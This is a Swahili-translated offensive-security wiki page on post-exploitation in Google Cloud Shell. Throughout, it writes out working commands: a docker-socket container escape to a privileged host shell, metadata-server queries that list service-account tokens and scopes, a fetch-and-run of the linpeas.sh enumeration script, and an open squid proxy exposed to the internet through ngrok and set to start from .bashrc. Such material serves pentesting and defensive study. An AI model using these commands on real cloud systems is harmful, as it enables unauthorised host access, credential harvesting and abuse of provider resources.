GCP - Cloud Shell Post Exploitation

Cloud Shell

Kwa maelezo zaidi kuhusu Cloud Shell angalia:

Container Escape

Kumbuka kwamba Google Cloud Shell inafanya kazi ndani ya kontena, unaweza kutoroka kwa urahisi hadi mwenyeji kwa kufanya:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Hii haitambuliki kama udhaifu na google, lakini inakupa mtazamo mpana wa kile kinachotokea katika mazingira hayo.

Zaidi ya hayo, angalia kwamba kutoka kwa mwenyeji unaweza kupata tokeni ya akaunti ya huduma:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Na mipaka ifuatayo:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Kagua metadata kwa kutumia LinPEAS:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Baada ya kutumia https://github.com/carlospolop/bf_my_gcp_permissions na token ya Akaunti ya Huduma hakuna ruhusa iliyogunduliwa...

Tumia kama Proxy

Ikiwa unataka kutumia mfano wako wa google cloud shell kama proxy unahitaji kukimbia amri zifuatazo (au ziweke kwenye faili .bashrc):

sudo apt install -y squid

Just for let you know Squid is a http proxy server. Create a squid.conf file with the following settings:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

nakala faili la squid.conf kwenye /etc/squid

sudo cp squid.conf /etc/squid

Hatimaye, endesha huduma ya squid:

sudo service squid start

Tumia ngrok kuruhusu proxy ipatikane kutoka nje:

./ngrok tcp 3128

Baada ya kuendesha nakala ya url ya tcp://. Ikiwa unataka kuendesha proxy kutoka kwa kivinjari, inapendekezwa kuondoa sehemu ya tcp:// na bandari na kuweka bandari hiyo katika uwanja wa bandari wa mipangilio ya proxy ya kivinjari chako (squid ni seva ya proxy ya http).

Kwa matumizi bora wakati wa kuanzisha, faili ya .bashrc inapaswa kuwa na mistari ifuatayo:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

The instructions were copied from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Angalia ukurasa huo kwa mawazo mengine ya ajabu ya kuendesha aina yoyote ya programu (mifumo ya data na hata windows) katika Cloud Shell.